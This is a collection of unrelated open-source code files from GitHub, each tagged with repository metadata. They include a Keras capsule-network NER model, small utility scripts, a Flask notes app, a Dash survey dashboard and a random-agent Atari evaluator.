print ("masked_by_y", masked_by_y.get_shape())
print ("train_decoder_dense1", train_decoder_dense1.get_shape())
print ("train_decoder_dense1_dropout", train_decoder_dense1_dropout.get_shape())
print ("train_decoder_dense2", train_decoder_dense2.get_shape())
print ("train_decoder_dense2_dropout", train_decoder_dense2_dropout.get_shape())
print ("train_decoder_output", train_decoder_output.get_shape())
print ("masked", masked.get_shape())
print ("eval_decoder_dense1", eval_decoder_dense1.get_shape())
print ("eval_decoder_dense2", eval_decoder_dense2.get_shape())
print ("eval_decoder_output", eval_decoder_output.get_shape())
# construct input list
if hyper_param['use_pos_tags'] and hyper_param['use_capitalization_info'] :
input_list = [x, x_pos, x_capital]
elif hyper_param['use_pos_tags'] and (not hyper_param['use_capitalization_info']) :
input_list = [x, x_pos]
elif (not hyper_param['use_pos_tags']) and hyper_param['use_capitalization_info'] :
input_list = [x, x_capital]
else:
input_list = [x]
if hyper_param['use_decoder']==False:
print ("decoder/reconstruction DISabled")
print ("returning 1 model")
return Model(inputs=input_list, outputs=[out_pred])
else :
train_model = Model(inputs=input_list+[decoder_y_cat], outputs=[out_pred, train_decoder_output])
eval_model = Model(inputs=input_list, outputs=[out_pred, eval_decoder_output])
print ("decoder/reconstruction enabled")
print ("returning a list of 2 models: train_model, eval_model")
return train_model, eval_model
# marginal loss
def margin_loss(y_true, y_pred):
L = y_true * KB.square(KB.maximum(0., 0.9 - y_pred)) + 0.5 * (1 - y_true) * KB.square(KB.maximum(0., y_pred - 0.1))
return KB.mean(KB.sum(L, 1))
# decoder loss
def custom_cosine_proximity(y_true, y_pred):
y_true = tf.nn.l2_normalize(y_true, dim=-1)
y_pred = tf.nn.l2_normalize(y_pred, dim=-1)
return -KB.sum(y_true * y_pred)
# compile the model
def compile_caps_model(hyper_param, model):
"""
Input: keras.models.Model object, see draw_capsnet_model() output. This is a graph with all layers drawn and connected
do:
compile with loss function and optimizer
Returns: compiled model
"""
if hyper_param['optimizer'] == "Adam":
opt = optimizers.Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)
elif hyper_param['optimizer'] == "SGD":
opt = optimizers.SGD(lr=0.001, decay=1e-6, momentum=0.5, nesterov=True)
elif hyper_param['optimizer'] == None:
raise Exception("No optimizer specified")
if hyper_param.get('use_decoder') == True:
if hyper_param['loss_function'] == 'custom_cosine':
decodeLoss = custom_cosine_proximity
else:
decodeLoss = hyper_param['loss_function']
model_loss = [margin_loss, decodeLoss] # work in progress
loss_wts = [1, hyper_param['lam_recon']]
else:
model_loss = margin_loss
loss_wts = None
model.compile(optimizer=opt, #'adam',
loss=model_loss,
loss_weights=loss_wts,
metrics={'out_pred':'accuracy'})
return model
def fit_model( hyper_param, model, modelName, trainX_dict, devX_list_arrayS, trainY_dict, devY_list_arrayS):
#Saving weights and logging
log = callbacks.CSVLogger(hyper_param['save_dir'] + '/{0}_historylog.csv'.format(modelName))
tb = callbacks.TensorBoard(log_dir=hyper_param['save_dir'] + '/tensorboard-logs', \
batch_size=hyper_param['batch_size'], histogram_freq=hyper_param['debug'])
checkpoint = callbacks.ModelCheckpoint(hyper_param['save_dir'] + '/weights-{epoch:02d}.h5', \
save_best_only=True, save_weights_only=True, verbose=1)
es = callbacks.EarlyStopping(patience=hyper_param['stopping_patience'], verbose=2)
#lr_decay = callbacks.LearningRateScheduler(schedule=lambda epoch: 0.001 * np.exp(-epoch / 10.))
model.summary()
# Save a png of the model shapes and flow
# must have installed pydot and graphviz...
# conda install pydot
# conda install -c anaconda graphviz
# sometimes graphviz is a little squirrely, if so, use: pip install graphviz
# plot_model( model, to_file=hyper_param['save_dir'] + '/{0}.png'.format(modelName), show_shapes=True)
#loss = margin_loss
data = model.fit( x=trainX_dict, # {'x':trainX, 'x_pos':trainX_pos_cat, 'x_capital':trainX_capitals_cat, (o)'decoder_y_cat':trainY_cat}
y=trainY_dict, #!{'out_pred':trainY_cat, (o)'decoder_output':train_decoderY}
batch_size=hyper_param['batch_size'],
epochs=hyper_param['epochs'],
validation_data=[devX_list_arrayS, devY_list_arrayS], #! [devX, devX_pos_cat, devX_capitals_cat, (o)devY_cat], [devY_cat, (o)dev_decoderY]
callbacks=[log, tb, checkpoint, es],
verbose=1)
| Chucooleg/CapsNet_for_NER | code/buildCapsModel.py | buildCapsModel.py | py | 12,144 | python | en | code | 10 | github-code | 36 |
10500012306 |
thunderstorm = '\U0001F4A8' # Code: 200's, 900, 901, 902, 905
drizzle = '\U0001F4A7' # Code: 300's
rain = '\U0001F327' # Code: 500's
snowflake = '\U00002744' # Code: 600's snowflake
snowman = '\U000026C4' # Code: 600's snowman, 903, 906
atmosphere = '\U0001F301' # Code: 700's foogy
clearSky = '\U00002600' # Code: 800 clear sky
fewClouds = '\U000026C5' # Code: 801 sun behind clouds
clouds = '\U00002601' # Code: 802-803-804 clouds general
hot = '\U0001F525' # Code: 904
defaultEmoji = '\U0001F300' # default emojis
def getemoji(weatherid):
if weatherid:
if str(weatherid)[0] == '2' or weatherid == 900 or weatherid == 901 or weatherid == 902 or weatherid == 905:
return thunderstorm
elif str(weatherid)[0] == '3':
return drizzle
elif str(weatherid)[0] == '5':
return rain
elif str(weatherid)[0] == '6' or weatherid == 903 or weatherid == 906:
return snowflake + ' ' + snowman
elif str(weatherid)[0] == '7':
return atmosphere
elif weatherid == 800:
return clearSky
elif weatherid == 801:
return fewClouds
elif weatherid == 802 or weatherid == 803 or weatherid == 804:
return clouds
elif weatherid == 904:
return hot
else:
return defaultEmoji
else:
return defaultEmoji
| lotrik84/get_the_weather_bot | emoji.py | emoji.py | py | 1,400 | python | en | code | 0 | github-code | 36 |
14438218202 | import psycopg2
update_sql = "UPDATE test SET data = %s WHERE num = %s"
conn = None
try:
# connect to the PostgreSQL database
conn = psycopg2.connect(
dbname='spacedys',
host='localhost',
user='spacedys',
password='password')
# create a new cursor
cur = conn.cursor()
# execute the UPDTE statement
cur.execute(update_sql, ("ghjklm", 100))
print("Rows modified:")
print(cur.rowcount)
# commit the changes to the database
conn.commit()
# close communication with the database
cur.close()
except (Exception, psycopg2.DatabaseError) as error:
print(error)
finally:
if conn is not None:
conn.close()
| nicolacammillini/spacedys | docs/demos/db/update-pg.py | update-pg.py | py | 694 | python | en | code | 0 | github-code | 36 |
23216322875 | """Add season_bet table
Revision ID: 8076a0692fc3
Revises:
Create Date: 2023-03-12 10:53:35.538988
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '8076a0692fc3'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('season_bet',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('value', sa.String(length=50), nullable=True),
sa.Column('rank', sa.Integer(), nullable=True),
sa.Column('type', sa.String(length=50), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('season_bet')
# ### end Alembic commands ###
| rbikar/f1-guessing-game-app | migrations/versions/8076a0692fc3_add_season_bet_table.py | 8076a0692fc3_add_season_bet_table.py | py | 962 | python | en | code | 0 | github-code | 36 |
20798421821 |
# coding: utf-8
# In[1]:
import os
import re
# In[2]:
# reads lines from a text file given by filename
def readlines(filename):
file = open(filename, "r")
return file.readlines()
# In[3]:
def parse_generation_line(line):
regex = r"(\d+) generations"
match = re.search(regex, line)
return match.group(1)
# In[4]:
def parse_duration_line(line):
regex = r"(\d+\.\d+) seconds"
match = re.search(regex, line)
return match.group(1)
# In[5]:
# log files have 2 intro lines, followed by
# a generation count, and duration line
lines_per_test = 30 * 2
def process_test_log(lines, csv_file):
# Retain runs details
csv_file.write(lines[0])
csv_file.write(lines[1])
lines = lines[2:]
# write CSV headings
csv_file.write("generation,duration\n")
for i in range(0, lines_per_test, 2):
# generation = parse_generation_line(lines[i])
duration = parse_duration_line(lines[i+1])
# print('{}, {}'.format(generation, duration))
# csv_file.write('{}, {}\n'.format(generation, duration))
csv_file.write('{}\n'.format(duration))
# return unprocessed lines
return lines[lines_per_test:]
# In[6]:
def create_csv_file(logfile):
prefix, suffix = logfile.split(".")
# print('prefix: {}\nsuffix: {}'.format(prefix, suffix))
csv_filename = prefix + ".csv"
csvfile = open(csv_filename, "w")
lines = readlines(logfile)
while (len(lines) > 0):
lines = process_test_log(lines, csvfile)
csvfile.close()
# In[7]:
for file in os.listdir("./"):
if file.endswith(".log"):
create_csv_file(file)
| blogscot/travelling-salesman | tools/munge.py | munge.py | py | 1,649 | python | en | code | 3 | github-code | 36 |
15872415911 | import torch
import numpy as np
from falkon import Falkon
from falkon.kernels import GaussianKernel
from falkon.options import FalkonOptions
from falkonhep.models import HEPModel
class FalkonHEPModel(HEPModel):
def create_labels(self, ref_size, data_size):
ref_labels = np.zeros(ref_size, dtype=np.float64) - 1
data_labels = np.ones(data_size, dtype=np.float64)
return np.hstack((ref_labels, data_labels))
def __loglikelihood(self, f):
c = 1e-5
p = (f + 1)/2
n = (1 - f)/2
return torch.log(p / n)
def predict(self, data):
preds = self.model.predict(torch.from_numpy(data).contiguous())
return self.__loglikelihood(preds)
def build_model(self, model_parameters, weight):
def weight_fun(Y, X, idx):
wvec = torch.ones(Y.shape,dtype=Y.dtype)
wvec[Y==-1] = weight
return wvec
cg_tol = model_parameters['cg_tol'] if 'cg_tol' in model_parameters else 1e-7
keops_active = model_parameters['keops_active'] if 'keops_active' in model_parameters else "no"
maxiter = model_parameters['maxiter'] if 'maxiter' in model_parameters else 10000000
use_cpu = model_parameters['use_cpu'] if 'use_cpu' in model_parameters else False
seed = model_parameters['seed'] if 'seed' in model_parameters else None
kernel = GaussianKernel(torch.Tensor([model_parameters['sigma']]))
configuration = {
'kernel' : kernel,
'penalty' : model_parameters['penalty'],
'maxiter' : maxiter,
'M' : model_parameters['M'],
'options' : FalkonOptions(cg_tolerance=cg_tol, keops_active=keops_active, use_cpu=use_cpu),
'weight_fn' : weight_fun,
'seed' : seed
}
self.model= Falkon(**configuration) | FalkonHEP/falkonhep | falkonhep/models/flkhep_model.py | flkhep_model.py | py | 1,858 | python | en | code | 1 | github-code | 36 |
28068819422 | # 숫자 문자열과 영단어
# https://programmers.co.kr/learn/courses/30/lessons/81301
def solution(s):
answer = ''
_dict = {'zero': 0, 'one': 1, 'two': 2, 'three': 3, 'four': 4, 'five': 5, 'six': 6, 'seven': 7, 'eight': 8, 'nine': 9}
alpha = ''
for i in s:
if i.isalpha():
alpha += i
if alpha in _dict.keys():
answer += str(_dict[alpha])
alpha = ''
else:
answer += i
return int(answer)
s = 'one4seveneight'
print(solution(s))
| hwanginbeom/algorithm_study | 2.algorithm_test/21.07.11/21.07.11_wooseok.py | 21.07.11_wooseok.py | py | 544 | python | en | code | 3 | github-code | 36 |
34212066405 | # https://www.acmicpc.net/problem/14502
# solution
# 1) 임의로 3개의 벽을 세운다(dfs)
# 2) 바이러스를 퍼뜨린다(bfs)
# 3) 안전구역의 크기를 구해서 최대값을 갱신한다
# 4) 1)로 돌아가 모든 경우에 대해 반복한다
# 5) 안전구역 크기의 최대값을 출력한다
# TIL
# 2차원 배열에서 가능한 모든 조합을 재귀적으로 탐색하는 코드( line:60~66 )
## -> 몫(i//m)과 나머지(i%m)를 이용한 탐색과 재귀함수 내에 반복문 있는 형태
import copy
from collections import deque
def calc_safe_area():
global walled_map
area = 0
for i in range(N):
for j in range(M):
if walled_map[i][j] == 0:
area += 1
return area
def virus_spread(virus_lst_copy): # 초기의 virus_lst를 받아서 bfs로 virus 퍼뜨림
global walled_map
dx = [1,0,-1,0]
dy = [0,1,0,-1]
q = deque(virus_lst_copy)
while len(q) > 0:
x, y = q.popleft()
for d_idx in range(4):
next_x = x + dx[d_idx]
next_y = y + dy[d_idx]
if ( (next_x >=0) and (next_x <N) and (next_y >=0) and (next_y <M) and (walled_map[next_x][next_y]==0) ):
walled_map[next_x][next_y] = 2
q.append((next_x,next_y))
def calculate(start, wall_cnt): # 벽을 세운 뒤 바이러스 퍼뜨리고 안전구역 넓이 계산해 최대값일 경우 갱신
global lab_map, max_area, N, M
if wall_cnt == 3: # 3개의 벽 모두 세워짐
global walled_map
walled_map = copy.deepcopy(lab_map)
virus_lst_copy = copy.deepcopy(virus_lst)
virus_spread(virus_lst_copy)
max_area = max(max_area, calc_safe_area())
return
for i in range(start, N*M):
x = i//M
y = i%M
if lab_map[x][y] == 0:
lab_map[x][y] = 1
calculate(i+1,wall_cnt+1)
lab_map[x][y] = 0
if __name__ == "__main__":
N, M = tuple(map(int, input().split()))
lab_map = []
for _ in range(N):
lab_map.append(list(map(int, input().split())))
virus_lst = []
for i in range(N):
for j in range(M):
if lab_map[i][j] == 2:
virus_lst.append((i,j))
max_area = 0 # 안전구역의 최대크기
calculate(0,0)
print(max_area)
| chankoo/problem-solving | graph/14502-연구소.py | 14502-연구소.py | py | 2,358 | python | ko | code | 1 | github-code | 36 |
22377349542 | import pandas as pd
import matplotlib.pyplot as plt
import os # file muveletek
import datetime
from datetime import date
import time
import copy
import numpy as np
class nHop:
time_stamp = ''
next_hop = ''
count = 0
per8 = 0
adv_range = 0
def __init__(self):
self.time_stamp = ''
self.next_hop = ''
self.count = 0
self.per8 = 0
self.adv_range = 0
def blank_sheet(self):
self.time_stamp = ''
self.next_hop = ''
self.count = 0
self.per8 = 0
def tostring(self):
return str(self.time_stamp) + "," + str(self.next_hop) + "," + str(self.count) + "," + str(self.per8) + "," + str(self.adv_range)
class Ip:
time_stamp = ''
address = 0
prefix = 0
nh = 0
msp = 0
bin = ''
def __init__(self, address, prefix, nh):
self.address = address
self.prefix = prefix
self.nh = nh
def tostring(self):
return str(self.bin) + '\t' + str(self.address) + '\t' + str(self.nh) + '\t' + str(self.prefix) + '\t' + str(
self.msp)
def write_pre_bin(self):
return str(self.bin[0:int(self.prefix)])
def store_to_list(filepath): # első prefix tárolása
lst = []
with open(filepath) as fp:
line = fp.readline()
# default gateway kihagyása
if line[8] == '0':
line = fp.readline()
cnt = 1
while line:
# print("Line {}: {}".format(cnt, line.strip()))
tmp = line.split("\t")
tmp2 = tmp[0].split("/")
p = Ip(tmp2[0], tmp2[1], tmp[1].strip())
mydate= filepath.split("_")[-1].split('.')[0]
p.time_stamp = mydate[0]+mydate[1]+mydate[2]+mydate[3]+'-'+mydate[4]+mydate[5]+'-'+mydate[6]+mydate[7]
lst.append(p)
cnt += 1
line = fp.readline()
fp.close()
return lst
def calc_per8(per8):
return (2 ** (32 - int(per8))) / (2 ** 24)
location = "C:/o"
workFiles = []
workList = []
hops = {}
if __name__ == "__main__":
start = datetime.datetime.now()
print('start ' + str(start))
for root, dirs, files in os.walk(location):
for file in files:
if file.split('.')[-1] == 'txt':
workFiles.append(root + '/' + file)
print(root + '/' + file)
# for filepath in workFiles:
# store_to_list(filepath, workList)
workList = store_to_list("F:/cha6/in/bme_fib_20191101.txt")
for item in workList:
if item.nh not in hops:
hop = nHop()
hop.time_stamp = item.time_stamp
hop.next_hop = item.nh
hop.count = 1
hop.per8 = calc_per8(item.prefix)
hop.adv_range = 2 ** (32 - int(item.prefix))
hops[item.nh] = hop
else:
hop = nHop()
hop.time_stamp = item.time_stamp
hop.next_hop = item.nh
hop.count = hops[item.nh].count + 1
hop.per8 = hops[item.nh].per8 + calc_per8(item.prefix)
hop.adv_range = hops[item.nh].adv_range + 2 ** (32 - int(item.prefix))
hops[item.nh] = hop
for hop in hops.values():
print(hop.tostring())
print('finished ' + str(datetime.datetime.now() - start))
| Tomikaze/IP-stats-trends | venv/nexthop.py | nexthop.py | py | 2,796 | python | en | code | 0 | github-code | 36 |
13483905571 | import numpy as np
from numpy import random
BIT_WIDTH = 20
NUM_CLASS = 4
class FizzBuzzDataSet(object):
TOTAL_DATA = 0
CURRENT_I = 0
def __init__(self, size):
if size < 0:
size = 0
self.TOTAL_DATA = size
self.CURRENT_I = 0
@staticmethod
def _encode(num):
return [num >> d & 1 for d in range(BIT_WIDTH)]
@staticmethod
def _encode_label(num):
if num % 15 == 0:
return 0
elif num % 5 == 0:
return 1
elif num % 3 == 0:
return 2
else:
return 3
def _labels(self, nums):
result_label = []
for i in range(len(nums)):
label_y = self._encode_label(nums[i])
result_label.append(label_y)
return np.array(result_label)
def _numbers(self, size):
"""
Assume the numbers for fizzbuzz won't be needing more than 10 bits < 1024
"""
result_data = []
result_num = []
for i in range(size):
num = random.randint(0, (1<<BIT_WIDTH)-1)
result_num.append(num)
encoded = self._encode(num)
result_data.append(encoded)
return np.array(result_data), result_num
def next_batch(self, batch_size):
"""
Returns:
data
label
"""
size = batch_size
input_x, real_nums = self._numbers(size)
label_y = self._labels(real_nums)
return input_x, label_y
@property
def num_examples(self):
return self.TOTAL_DATA
| BrianPin/fbitf | data_set.py | data_set.py | py | 1,588 | python | en | code | 0 | github-code | 36 |
23536887489 | import numpy as np
from collections import deque
import gymnasium as gym
from stable_baselines3.common.atari_wrappers import (
ClipRewardEnv,
EpisodicLifeEnv,
FireResetEnv,
MaxAndSkipEnv,
NoopResetEnv,
)
class Agent:
    """Random-policy evaluation agent for a (single) vectorized env."""

    def __init__(self, eval_env):
        self.eval_env = eval_env

    def eval(self):
        """Play one episode with uniformly random actions.

        Returns the episode return and episode length reported by the
        env's RecordEpisodeStatistics wrapper via ``final_info``.
        """
        self.eval_env.reset()
        while True:
            actions = np.array([self.eval_env.single_action_space.sample()])
            _, _, _, _, infos = self.eval_env.step(actions)
            if "final_info" not in infos:
                continue
            for info in infos["final_info"]:
                # Skip sub-envs that did not finish this step.
                if "episode" in info:
                    return info["episode"]["r"], info["episode"]["l"]

    def run(self):
        """Average return/length over 10 random episodes."""
        returns = deque(maxlen=10)
        lengths = deque(maxlen=10)
        for _ in range(10):
            ep_return, ep_length = self.eval()
            returns.append(ep_return)
            lengths.append(ep_length)
        return np.mean(returns), np.mean(lengths)
if __name__ == "__main__":
    def make_env(env_name, seed, resize=84):
        """Return a thunk building one Atari env with the standard DQN wrappers."""
        def thunk():
            env = gym.make(env_name)
            env = gym.wrappers.RecordEpisodeStatistics(env)
            env = NoopResetEnv(env, noop_max=30)
            env = MaxAndSkipEnv(env, skip=4)
            env = EpisodicLifeEnv(env)
            if "FIRE" in env.unwrapped.get_action_meanings():
                env = FireResetEnv(env)
            env = ClipRewardEnv(env)
            if len(env.observation_space.shape):  # pixel obs
                env = gym.wrappers.ResizeObservation(env, (resize, resize))
                env = gym.wrappers.GrayScaleObservation(env)
                env = gym.wrappers.FrameStack(env, 4)
            env.action_space.seed(seed)
            return env
        return thunk

    env_names = [
        "Alien-v5", "Amidar-v5", "Assault-v5", "Asterix-v5", "BankHeist-v5",
        "BattleZone-v5", "Boxing-v5", "Breakout-v5", "ChopperCommand-v5", "CrazyClimber-v5",
        "DemonAttack-v5", "Freeway-v5", "Frostbite-v5", "Gopher-v5", "Hero-v5",
        "IceHockey-v5", "Jamesbond-v5", "Kangaroo-v5", "Krull-v5", "KungFuMaster-v5",
        "MsPacman-v5", "Pong-v5", "PrivateEye-v5", "Seaquest-v5", "Skiing-v5",
        "Surround-v5", "Tennis-v5", "UpNDown-v5"
    ]

    for env in env_names:
        eval_env = gym.vector.SyncVectorEnv([make_env("ALE/" + env, 1)])
        random_agent = Agent(eval_env)
        rewards = deque(maxlen=10)
        steps = deque(maxlen=10)
        for i in range(10):
            reward, step = random_agent.run()
            rewards.append(reward)
            steps.append(step)
        # BUG FIX: the second pair previously re-printed the reward mean next
        # to the step std; report the episode-length statistics instead.
        print(env, "\t", np.mean(rewards), np.std(rewards), "\t", np.mean(steps), np.std(steps))
| ZangZehua/rlatari | utils/random_atari.py | random_atari.py | py | 2,894 | python | en | code | 2 | github-code | 36 |
20078510579 | from flask import Blueprint, render_template, url_for, request, send_from_directory
from flask_login import login_required, current_user
from werkzeug.utils import redirect
from crm import db
from ..utils.images_handler import save_image_uploads, get_image_list, load_image_uploads, delete_images
from .forms import NewNoteForm, DeleteNoteForm
from .models import Note
bp_note = Blueprint('note', __name__, template_folder='templates')
@bp_note.route('uploads/<filename>')
def uploads(filename):
    # Serve a previously uploaded note image by filename.
    return load_image_uploads(filename)
@bp_note.route('/', methods=['GET'])
@login_required
def notes():
    """Render the list of all notes together with their authors."""
    all_notes = Note.get_all_with_users()
    return render_template('notes.html', notes=all_notes, title='Notatki')
@bp_note.route('/<idx>', methods=['GET'])
@login_required
def note(idx):
    """Render the detail page of one note, including its images if any."""
    current = Note.get_by_id_with_user(idx)
    form = DeleteNoteForm()
    image_list = get_image_list(current) if current.image else ''
    return render_template('note.html', note=current, form=form,
                           image_list=image_list, title='Szczegóły notatki')
@bp_note.route('/add', methods=['GET', 'POST'])
@login_required
def add():
    """Create a new note for the current user, optionally linked to a client
    or offer (query-string ids) and with uploaded images attached."""
    form = NewNoteForm()
    if form.validate_on_submit():
        note = Note(title=form.title.data,
                    description=form.description.data,
                    user_id=current_user.id,
                    expire_date=form.expire_date.data,
                    on_todo_list=form.on_todo_list.data)
        # NOTE(review): the presence check coerces with type=int but the
        # assignment re-reads the raw string value — confirm the model/DB
        # layer coerces it.
        if request.args.get('client_id', default=False, type=int):
            note.client_id = request.args.get('client_id')
        if request.args.get('offer_id', default=False, type=int):
            note.offer_id = request.args.get('offer_id')
        db.session.add(note)
        # Flush so note gets its primary key before image filenames are built.
        db.session.flush()
        filename = save_image_uploads(form.images, note, current_user.initials)
        if filename:
            note.image = filename
        db.session.commit()
        return redirect(url_for('note.notes'))
    return render_template('add_note.html', form=form, title='Dodawanie notatki')
@bp_note.route("/delete/<int:idx><delete_img>", methods=['GET'])
@login_required
def delete(idx, delete_img):
    """Delete a note; when delete_img is the literal string 'True', also
    delete its uploaded images.

    NOTE(review): delete_img arrives as a raw path segment appended directly
    after the id, hence the string comparison below.
    """
    note = Note.query.get(idx)
    db.session.delete(note)
    db.session.commit()
    if delete_img == 'True':
        delete_images(note)
    return redirect(url_for('note.notes'))
| tomasz-rzesikowski/crm | crm/note/views.py | views.py | py | 2,354 | python | en | code | 0 | github-code | 36 |
12575982154 | from distutils.log import INFO
from multiprocessing.sharedctypes import Value
from dash import Dash, html, dcc, Input, Output, State, dash_table
import dash
import dash_bootstrap_components as dbc
import LoraLogger
import pandas as pd
import json
import plotly.io as pio
# Default every Plotly figure on the dashboard to the dark theme.
pio.templates.default = "plotly_dark"
logger = LoraLogger.logger(__name__, INFO)
# app = Dash(__name__, use_pages=True, external_stylesheets=[dbc.themes.VAPOR])
app = Dash(__name__, use_pages=True)
# read data
data_df = pd.read_excel('utils/FAI_results.xlsx')
# Demographic radio button options mappings
with open('utils/demo_mapping.json', 'r') as f:
    demo_mapping = json.load(f)
with open('utils/demo_groups.json', 'r') as f:
    demo_groups = json.load(f)
with open('utils/fin_mapping.json', 'r') as f:
    fin_mapping = json.load(f)
with open('utils/fin_groups.json', 'r') as f:
    fin_groups = json.load(f)
# Small inline "|" separator placed between checklist groups in the layout.
l_break = html.P(
    id='separate',
    children='|',
    style={
        'display': 'inline',
        'margin': '0 5px 0 -5px'
    }
)
# Page skeleton: title, grouping controls, per-page nav buttons, raw-data
# download, and the dash-pages container. The group/trace checklists here
# are placeholders that the callbacks below repopulate.
app.layout = html.Div([
    html.H1(
        children='PolyU & AskLora FAI Result',
        style={
            'textAlign': 'center',
            'margin-top': '15px'
        }
    ),
    html.H5(
        children='Grouping Method',
        style={
            'textAlign': 'center',
            'margin-top': '15px'
        }
    ),
    # Top-level choice: group respondents by demographics or fintech usage.
    dbc.RadioItems(
        id='gp_method',
        persistence=True,
        persistence_type='memory',
        options=[
            {
                "label": "Demographics",
                "value": "demo"
            },
            {
                "label": "Fintech Usage",
                "value": "fin"
            }
        ],
        value="demo",
        style={
            'textAlign': 'center',
        },
        labelStyle={
            'display': 'block',
        },
        inline=True
    ),
    html.Div(
        id='gp_details',
        children=[
            html.H5(
                id='gp_title_big',
                style={
                    'textAlign': 'center',
                    'margin-top': '15px'
                }
            ),
            # Category radios; options filled by update_group_options().
            dbc.RadioItems(
                id='demograph',
                persistence=True,
                persistence_type='memory',
                style={
                    'textAlign': 'center',
                },
                labelStyle={
                    'display': 'block',
                },
                inline=True,
                switch=True
            ),
            html.H5(
                id='gp_title',
                children=[
                    'Groups to show'
                ],
                style={
                    'textAlign': 'center',
                    'margin-top': '15px'
                }
            ),
            html.Div(
                children=[
                    html.Div(
                        id='group_options_bar',
                        children=[
                            html.Div(
                                id='group_options',
                                children=[
                                    dbc.Checklist(
                                        id='groups',
                                    ),
                                ],
                                style={
                                    'display': 'inline'
                                }
                            ),
                            html.Div(
                                id='group_options_traces',
                                children=[
                                    dbc.Checklist(
                                        id='bin_fin',
                                    ),
                                ],
                                style={
                                    'display': 'inline'
                                }
                            ),
                        ],
                        style={
                            'display': 'inline'
                        }
                    ),
                    dbc.Checklist(
                        id='percent',
                        persistence=True,
                        persistence_type='memory',
                        options=[
                            {'label': 'show percentage w.r.t. group', 'value': 'True'}],
                        value=[],
                        inline=True,
                        switch=True,
                        style={
                            'display': 'inline'
                        }
                    )
                ],
                style={
                    'textAlign': 'center',
                    'margin-top': '15px'
                }
            )
        ]
    ),
    # Nav buttons for every non-"Segment" page, plus the raw-data download.
    html.Div(
        children=[
            html.Div(
                dcc.Link(
                    dbc.Button(page['name'].replace('_', ' ')),
                    href=page["relative_path"],
                    style={
                        'margin': '10px',
                    }
                ),
                style={
                    'display': 'inline-block'
                }
            )
            for page in dash.page_registry.values() if not page['name'].startswith('Segment')
        ] + [
            dbc.Button(
                "Download Raw Data Excel Sheet", id="download_xlsx_btn", style={'margin': '10px'}, color='info'
            ),
            dcc.Download(id="download_xlsx")
        ],
        style={
            'text-align': 'center',
            'padding-top': '20px',
            'padding-bottom': '20px',
        }
    ),
    # Second row of nav buttons, only for the "Segment*" pages.
    html.Div(
        [
            html.Div(
                dcc.Link(
                    dbc.Button(page['name'].replace(
                        '_', ' '), color='danger'),
                    href=page["relative_path"],
                    style={
                        'margin': '10px',
                    }
                ),
                style={
                    'display': 'inline-block'
                }
            )
            for page in dash.page_registry.values() if page['name'].startswith('Segment')
        ],
        style={
            'text-align': 'center',
            'padding-top': '0px',
            'padding-bottom': '20px',
        }
    ),
    dash.page_container
],
    # style={'height': '100vh'}
)
@ app.callback(
    Output("download_xlsx", "data"),
    Input("download_xlsx_btn", "n_clicks"),
    prevent_initial_call=True
)
def down(n_clicks):
    # Stream the raw survey workbook to the browser. n_clicks is unused but
    # required by the callback signature.
    return dcc.send_file("./utils/FAI_results.xlsx")
@ app.callback(
    Output(component_id='demograph', component_property='options'),
    Output(component_id='demograph', component_property='value'),
    Input(component_id='gp_method', component_property='value')
)
def update_group_options(method):
    """Populate the category radio items for the chosen grouping method.

    The last demo_mapping entry is the shared "all respondents" option and
    is always both prepended and preselected.
    """
    all_option = demo_mapping[-1]
    if method == "demo":
        return [all_option] + demo_mapping[0:5], all_option['value']
    if method == "fin":
        return [all_option] + fin_mapping[4:9], all_option['value']
@ app.callback(
    Output(component_id='group_options', component_property='children'),
    Output(component_id='group_options_traces', component_property='children'),
    Output(component_id='gp_title', component_property='style'),
    Output(component_id='gp_title_big', component_property='children'),
    [
        Input(component_id='demograph', component_property='value'),
        Input(component_id='gp_method', component_property='value')
    ]
)
def update_groups(demo, gp_method):
    """Rebuild the group checklist (and the fintech 'binary users' switch)
    whenever the selected category or grouping method changes.

    Returns (group checklist, traces children, 'Groups to show' title style,
    big title text).
    """
    def make_binary_switch(visible):
        # The "show binary users" switch; identical in every branch except
        # for its visibility, so build it in one place.
        return dbc.Checklist(
            id='bin_fin',
            persistence=True,
            persistence_type='memory',
            options=[
                {'label': 'show binary users', 'value': 'False'}],
            value=[],
            inline=True,
            switch=True,
            style={
                'display': 'inline' if visible else 'none'
            }
        )

    if gp_method == 'demo':
        groups = demo_groups
        gp_title = 'Demographic category to analyze'
    elif gp_method == 'fin':
        groups = fin_groups
        gp_title = 'Fintech usage to analyze'

    if demo == demo_mapping[-1]['value']:
        # "All respondents": one hidden checkbox standing for everyone.
        # (Bug fix: a stray trailing comma previously made this a 1-tuple.)
        checkboxes = dbc.Checklist(
            id='groups',
            persistence=True,
            persistence_type='memory',
            options=demo_groups[demo][0:1],
            style={
                'textAlign': 'center',
                'display': 'none'
            },
            value=[bool(demo_groups[demo][0]['value'])],
            inline=True
        )
        return checkboxes, make_binary_switch(False), {'display': 'none'}, gp_title

    checkboxes = dbc.Checklist(
        id='groups',
        persistence=True,
        persistence_type='memory',
        options=groups[demo],
        style={
            'textAlign': 'center',
            'display': 'inline'
        },
        value=[l['value'] for l in groups[demo]],
        inline=True
    )
    # Only the fintech view exposes the binary-user switch.
    binary_user = make_binary_switch(gp_method == 'fin')
    return checkboxes, [l_break, binary_user], {'textAlign': 'center', 'margin-top': '15px'}, gp_title
if __name__ == '__main__':
    # Binds on all interfaces; keep behind a reverse proxy / firewall.
    app.run_server(host="0.0.0.0", port=8051)
| adrwong/FAI | app.py | app.py | py | 10,096 | python | en | code | 0 | github-code | 36 |
23256745509 | from flask import Flask, render_template, request, session, redirect, flash, url_for
from flask_hashing import Hashing
import random
import secrets
from .utils import *
app = Flask(__name__)
app.config.from_object('config')
hashing = Hashing(app)
def _init_language_session(lang, banana_count):
    """Seed every per-language session key with its default value.

    *lang* is the capitalized suffix used in the session keys ('Spanish' or
    'Italian'); *banana_count* is how many tense checkboxes that language
    has ('bananeN<lang>' keys).
    """
    if f"time{lang}" not in session:
        session[f"time{lang}"] = "temps"
        session[f"pronouns{lang}"] = "pronoms"
        session[f"verb{lang}"] = "verbe"
    if f"banane{lang}" not in session:
